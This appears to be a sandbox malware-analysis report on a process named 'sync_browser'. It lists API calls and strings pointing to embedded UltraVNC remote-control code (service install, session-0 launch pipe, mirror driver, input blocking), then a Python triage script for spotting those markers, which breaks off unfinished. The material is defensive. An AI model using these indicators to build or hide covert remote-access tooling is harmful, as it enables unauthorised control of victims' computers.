                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CountTickselect
                                                                      • String ID:
                                                                      • API String ID: 2475007269-0
                                                                      APIs
                                                                      • Sleep.KERNEL32(?,?,?,00007FF7E51337F7,?,?,?,00007FF7E512FFD1,?,?,?,?,00007FF7E5128C19), ref: 00007FF7E5133331
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep_errno
                                                                      • String ID:
                                                                      • API String ID: 1068366078-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$String$Write$Desktop$Threadwsprintf$FileModuleName$CloseCurrentErrorInputLastMessageOpen_errno_invalid_parameter_noinfo
                                                                      • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DSMPluginConfig$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$Permission denied:Uncheck [_] Protect my computer... in run as dialog or use user with write permission.$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                      • API String ID: 634683900-3478490838
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
                                                                      • String ID: $AllowEditClients$AllowLoopback$AllowProperties$AllowShutdown$AuthHosts$AuthRequired$AutoPortSelect$Avilog$BlankInputsOnly$BlankMonitorEnabled$ConnectPriority$DSMPlugin$DebugLevel$DebugMode$DefaultScale$DisableTrayIcon$EnableDriver$EnableHook$EnableJapInput$EnableVirtual$FTUserImpersonation$FileTransferEnabled$FileTransferTimeout$HTTPConnect$HTTPPortNumber$IdleTimeout$InputsEnabled$LocalInputsDisabled$LockSetting$LoopbackOnly$MSLogonRequired$MaxCpu$NewMSLogon$OnlyPollConsole$OnlyPollOnEvent$PollForeground$PollFullScreen$PollUnderCursor$PortNumber$QueryAccept$QueryIfNoLogon$QuerySetting$QueryTimeout$RemoveAero$RemoveWallpaper$SingleWindow$SingleWindowName$SocketConnect$TurboMode$UltraVNC$UseDSMPlugin$UseRegistry$XDMCPConnect$accept_reject_mesg$admin$admin_auth$clearconsole$group1$group2$group3$kickrdp$locdom1$locdom2$locdom3$passwd$passwd2$path$poll$primary$secondary
                                                                      • API String ID: 341937111-959611688
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressProc$Library$Event$DesktopThread$LoadMessageWindow$CreateFileFreeModuleNameObject$CloseCriticalDestroySectionTimer$ClassClipboardCombineCurrentDeleteDispatchEnterHandleInformationInputKillLeaveLongOpenPeekRectRegisterSleepStockTranslateUserViewerWaitfree
                                                                      • String ID: CaptureW8$ChangeWindowMessageFilter$SetHook$SetHooks$SetKeyboardFilterHook$SetMouseFilterHook$StartW8$StopW8$UnSetHook$UnSetHooks$WinVNC$WinVNC desktop sink$\schook64.dll$\vnchooks.dll$\w8hook64.dll$user32.dll$vncdesktopsink.cpp : InitWindow called$vncdesktopsink.cpp : InitWindow:!GetUserObjectInformation $vncdesktopsink.cpp : InitWindow:OpenInputdesktop Error $vncdesktopsink.cpp : InitWindow:OpenInputdesktop OK$vncdesktopsink.cpp : InitWindow:SelectHDESK to %s (%x) from %x$vncdesktopsink.cpp : InitWindow:SelectHDESK:!SetThreadDesktop $vncdesktopsink.cpp : OOOOOOOOOOOO %i %i$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_quit$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+3$vncdesktopsink.cpp : OOOOOOOOOOOO called wm_user+4$vncdesktopsink.cpp : OOOOOOOOOOOO end dispatch$vncdesktopsink.cpp : OOOOOOOOOOOO load hookdll's$vncdesktopsink.cpp : OOOOOOOOOOOO start dispatch$vncdesktopsink.cpp : REct3 %i %i %i %i $vncdesktopsink.cpp : RFB_MOUSE_UPDATE $vncdesktopsink.cpp : RFB_SCREEN_UPDATE $vncdesktopsink.cpp : failed to create hook window$vncdesktopsink.cpp : failed to register window class$vnchook
                                                                      • API String ID: 3632263120-2889214834
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ************** DEAD KEY$ Compose dead 0x%x 0x%x$ Composed 0x%x$ Found key$ SHORT s %i$ Simulating ALT+%d%d%d$ keysym 0x%x$CAD$Not Vista and runnning as system, use old method$Not Vista and runnning as user -> Taskmgr$Vista and runnning as system -> CAD$Vista and runnning as user -> Taskmgr$down$fake %d down$fake %d up$gfff$ignoring unknown keysym %d$ignoring unrecognised Latin-1 keysym 0x%x$latin-1 key: keysym %d(0x%x) vkCode 0x%x down %d capslockOn %d$taskmgr.exe
                                                                      • API String ID: 0-2541672151
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DesktopOpen$Close$EventThread$HandleProcess$FileModuleNameUser$CreateCriticalCurrentErrorExecuteInformationInitializeInputLastObjectQuerySectionShellSleepTokenValueVersionWindow
                                                                      • String ID: -softwarecadhelper$Ctrl-alt-del require service, no permission$Ctrl-alt-del require service, no permission$EnableLUA$Global\SessionEventUltraCad$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System$UAC is Disable, make registry changes to allow cad$UltraVNC Warning$Warning$Winsta0\Default$cad.exe$open$vistahook.cpp : !GetUserObjectInformation $vistahook.cpp : OpenInputdesktop Error $vistahook.cpp : OpenInputdesktop OK$vistahook.cpp : SelectHDESK to %s (%x) from %x$vistahook.cpp : SelectHDESK:!SetThreadDesktop
                                                                      • API String ID: 1732492099-311746058
                                                                      • Opcode ID: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                                      • Instruction ID: d45545f6ff2ad8697ffb18476473a1988b51828ae7e1631d52836c2e6e98e351
                                                                      • Opcode Fuzzy Hash: 364b0ab4c0a733f657dae5b09393cd9c81dc3f4ffc649c11128cba260e889681
                                                                      • Instruction Fuzzy Hash: CCF1A631A08B4A85EB20EB24F8647A9B3A5FF44B64F840137D95D87B98DF3CE515C722
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleSleep$Event$PrivateProfileWait$CreateFileLibraryModuleNameObjectOpenSingle$AddressCodeDesktopExecuteExitFreeLoadMultipleObjectsProcProcessShellStringVersionWindow
                                                                      • String ID: Global\SessionEventUltra$Global\SessionEventUltraCad$SendSAS$cad.exe$open$sas.dll
                                                                      • API String ID: 767217470-2348971971
                                                                      • Opcode ID: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                      • Instruction ID: 0bb3056cb3ca6e52b8abad5b0f4aabbe3c9dfee5ae8ebfbca1af60faf40313cc
                                                                      • Opcode Fuzzy Hash: 7d4960000cb2e9cc34650905f6e7b06f80ef93b8f83e24dd9411a62a6d9a1cef
                                                                      • Instruction Fuzzy Hash: 91C18F24A09B4B82EA64BB61B870779A3A4FF84F50F841137D95E87298DF3CA445C732
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CapsCompatibleCreateDeviceEnumErrorLastLibrary$AddressBitmapBitsDisplayFreeLoadProcSettingsWindows
                                                                      • String ID: DISPLAY$EnumDisplayDevicesA$USER32$WinVNC$mv video hook driver2$vncDesktop : memory device doesn't support GetDIBitsWinVNC cannot be used with this graphics device driver$vncDesktop : root device doesn't support BitBltWinVNC cannot be used with this graphic device driver$vncdesktop.cpp : Failed m_rootdc $vncdesktop.cpp : No driver used $vncdesktop.cpp : bitmap dimensions are %d x %d$vncdesktop.cpp : created memory bitmap$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to create compatibleDC(%d)$vncdesktop.cpp : failed to create memory bitmap(%d)$vncdesktop.cpp : got bitmap format$vncdesktop.cpp : unable to get display colour info$vncdesktop.cpp : unable to get display format
                                                                      • API String ID: 3851920378-1343955350
                                                                      • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                      • Instruction ID: 5cdec093bfa4fd6c34afb0bad76ecf6405e66bafe4e1046631792b70416c300e
                                                                      • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                      • Instruction Fuzzy Hash: 71023D726086CA86E710AF28E4607A9B7A1FB85F48F845437DA4D9769CDF3CD405C732
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                                      • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                      • API String ID: 4207610217-3713657650
                                                                      • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                      • Instruction ID: 2ef9de58085a295dc479e042ce3a5dffd26fea663b919621cbfeb2cf48811d98
                                                                      • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                      • Instruction Fuzzy Hash: 44C1A661A18A4A85EB60EB24F8207B9A7A4FF84F84FC45437EA4D87698EF3CD105C711
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
                                                                      • String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
                                                                      • API String ID: 384463373-239428621
                                                                      • Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                      • Instruction ID: 640d93e90d292fb30966bd4cd4ca1129627b7fc4be29a74c7fba35c41c28c98d
                                                                      • Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                      • Instruction Fuzzy Hash: A5B1CA31A0CA4A82E730AB24F4607B9A350FF84F60F945133D65E87A98EF3CE445C762
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
                                                                      • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                      • API String ID: 27940619-3388178877
                                                                      • Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                      • Instruction ID: b7dca72405105037753669e02c83f859bcef7eddd9265e7a0807e1316539ad3a
                                                                      • Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                      • Instruction Fuzzy Hash: 0EC1E631A0868A95EB20EF35B4607B9B7A1FF44F44F944436EA4E8B659EF3CE504C711
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                                      • String ID: ./\
                                                                      • API String ID: 385398445-3176372042
                                                                      • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                      • Instruction ID: 70dcea8ab5b55e8a33d7965dfe2ec2ecf751d7fa06c8147260b3be83d0e1c521
                                                                      • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                      • Instruction Fuzzy Hash: DEE1982690C28AC6E760AF10B07437EF7A0FB45F40F944036E68D96689DF7DE854DB22
                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Clipboard$CloseEmptyOpen
                                                                      • String ID:
                                                                      • API String ID: 1427272684-0
                                                                      • Opcode ID: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                      • Instruction ID: 4e70849872919aee896626a4cb56af0a462dc89a8537489b0eb6ff6263f6e749
                                                                      • Opcode Fuzzy Hash: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                      • Instruction Fuzzy Hash: 1CC16221B0974A96EA20BF65E4643BDA3A1BF45F84F845036DE0E87795EF3CE404C762
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                                      • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                                      • API String ID: 33112563-1779637096
                                                                      • Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                      • Instruction ID: 2b9b68037691b588d514472f7619a5282d475595603f8f5ab60381ab9b018dcc
                                                                      • Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                      • Instruction Fuzzy Hash: A4B15A32508BC58AE328EF78F86479AB7A4FB04B04F94453AC7AA42254DF7DF054C725
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
                                                                      • String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
                                                                      • API String ID: 2697070071-1399849103
                                                                      • Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                      • Instruction ID: 747c38b7f7c390d72744f267b78fdab71995d4d58a3e2067c63e5578f98872ee
                                                                      • Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                      • Instruction Fuzzy Hash: 2D81853561864A87EB24AF21B824779B395FB88F80F845136D94EC7B68EF3CE414C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
                                                                      • String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 2965397059-206656798
                                                                      • Opcode ID: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
                                                                      • Instruction ID: 24e2727238bf364e437d37a1480a997c66b3188b4d37302e6e679ce19cd1d1ee
                                                                      • Opcode Fuzzy Hash: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
                                                                      • Instruction Fuzzy Hash: 47420822A086C685E760AB39C4683FD67A1FB85F94F840237EA1D876D9DF3CD545C322
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
                                                                      • String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
                                                                      • API String ID: 2145620463-2328478964
                                                                      • Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                      • Instruction ID: 9e2616f76c3d0017125d865a62cbb8f5e2d0f3beefc67f1cde21f651bb8fb2de
                                                                      • Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                      • Instruction Fuzzy Hash: 2DE1D721A086CA85F720AF74E8547A9B3A1FF44B98F801236ED5D87B98EF3CD545C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 246551654-3977938048
                                                                      • Opcode ID: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
                                                                      • Instruction ID: f953257388671f4534d8244dbeb53b70500034f08b7c42df8199664dac774a9d
                                                                      • Opcode Fuzzy Hash: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
                                                                      • Instruction Fuzzy Hash: 2E22E232A086C586F764AB39D4687FE77A1FB84F58F844036EA4D876A8DF38D444C721
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
                                                                      • String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
                                                                      • API String ID: 1729393483-4131161223
                                                                      • Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                      • Instruction ID: a9e75516d06b639373761d6df3142d7796c8e4773b60ab5f2d7a0aaf1145df24
                                                                      • Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                      • Instruction Fuzzy Hash: 69B1C332B0964A86FB20EF34A4607B9B3A0FF44B54F945836EA5D9B688EF3CD505C711
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
                                                                      • String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
                                                                      • API String ID: 524771730-2664985301
                                                                      • Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                      • Instruction ID: 5aaae7c3f0ee4820fc72271631d7dab028f90b573b9570f5a87eaa3ef57b4adb
                                                                      • Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                      • Instruction Fuzzy Hash: F2D17435609B4AE5E710EB29B86176973A0FB48B60F904237DA6D837D4DF3CE121C712
                                                                      APIs
                                                                      • OpenSCManagerA.ADVAPI32 ref: 00007FF7E5082E5D
                                                                      • OpenServiceA.ADVAPI32 ref: 00007FF7E5082EAD
                                                                      • GetLastError.KERNEL32 ref: 00007FF7E5082EBB
                                                                      • CloseServiceHandle.ADVAPI32 ref: 00007FF7E5082EE0
                                                                        • Part of subcall function 00007FF7E507A040: OpenInputDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A07A
                                                                        • Part of subcall function 00007FF7E507A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7E507A083
                                                                        • Part of subcall function 00007FF7E507A040: GetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A08B
                                                                        • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0A6
                                                                        • Part of subcall function 00007FF7E507A040: MessageBoxA.USER32 ref: 00007FF7E507A0B7
                                                                        • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0C2
                                                                        • Part of subcall function 00007FF7E507A040: CloseDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0CB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
                                                                      • String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
                                                                      • API String ID: 1921882253-4018834470
                                                                      • Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                      • Instruction ID: eefa9b40e005ce99ac59b43b1904b2389d9f2d202bc56a768ea4e86d4406b82d
                                                                      • Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                      • Instruction Fuzzy Hash: 64411321A0864F81EA24BB25B835779A361FF49F54FC41037E90EC6259EF3CE545C722
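The String ID fields of the function records above (the uvnc_service service-control helper, the winsta.dll / \\.\Pipe\TerminalServer\SystemExecSrvr session launcher, the mv2 mirror-driver probe, the OpenInputdesktop2 desktop switch and the BlockInput/mouseupdate input handler) are reusable as triage markers for other dumps of the same UltraVNC server build. The script below is an added example for this page, not Joe Sandbox or UltraVNC code: it searches a memory dump or PE image for those markers, as ASCII and as UTF-16LE, and scores the result. The marker strings are copied from the report; the group names, weights, the threshold of 5 and the constructed SAMPLE_DUMP are assumptions made for the example.

```python
"""Score a memory dump or PE image for the UltraVNC string markers listed in
this report.  Added example; not Joe Sandbox or UltraVNC code.  Marker strings
are copied from the report's String ID fields; group names, weights, the
threshold and SAMPLE_DUMP are assumptions made for the example."""
import sys
from typing import Dict, List

# Markers grouped by the report function they were extracted from.
# Weights (assumed) favour markers that only a VNC server build carries.
UVNC_MARKERS: Dict[str, dict] = {
    # service install/remove helper (OpenSCManagerA/OpenServiceA record)
    "service_control": {
        "strings": [b"uvnc_service",
                    b"Failed to open service control manager",
                    b"Failed to delete the service"],
        "weight": 3,
    },
    # session-0 process launch via winsta.dll and the TerminalServer pipe
    "session0_launch": {
        "strings": [b"\\\\.\\Pipe\\TerminalServer\\SystemExecSrvr\\%d",
                    b"WinStationQueryInformationW",
                    b"Winsta0\\Winlogon"],
        "weight": 3,
    },
    # mirror-driver probing (mv2.dll, "mv video hook driver2")
    "mirror_driver": {
        "strings": [b"mv video hook driver2", b"mv2.dll",
                    b"driver info: required version 1.00.22"],
        "weight": 2,
    },
    # input-desktop switching (vncservice.cpp log strings)
    "desktop_switch": {
        "strings": [b"vncservice.cpp : OpenInputdesktop2 OK",
                    b"vncservice.cpp : SelectDesktop"],
        "weight": 2,
    },
    # remote input control messages
    "input_control": {
        "strings": [b"BlockInput", b"mouseupdate", b"screenupdate"],
        "weight": 1,
    },
}


def find_markers(data: bytes) -> Dict[str, List[str]]:
    """Return, per group, the markers present in `data`.

    Each marker is tried as ASCII and as UTF-16LE, since the same literal can
    be stored either way in a dump (assumption: all markers are pure ASCII)."""
    hits: Dict[str, List[str]] = {}
    for group, spec in UVNC_MARKERS.items():
        found = [s.decode("ascii") for s in spec["strings"]
                 if s in data or s.decode("ascii").encode("utf-16-le") in data]
        if found:
            hits[group] = found
    return hits


def score(hits: Dict[str, List[str]]) -> int:
    """Sum the weight of every group that produced at least one hit."""
    return sum(UVNC_MARKERS[g]["weight"] for g in hits)


def triage(data: bytes, threshold: int = 5) -> dict:
    """Classify a blob: 'ultravnc_server' once the weighted score reaches
    `threshold` (assumed default 5), otherwise 'inconclusive'."""
    hits = find_markers(data)
    total = score(hits)
    return {
        "score": total,
        "groups": sorted(hits),
        "hits": hits,
        "verdict": "ultravnc_server" if total >= threshold else "inconclusive",
    }


# Constructed sample dump: padding plus three markers, one stored as UTF-16LE.
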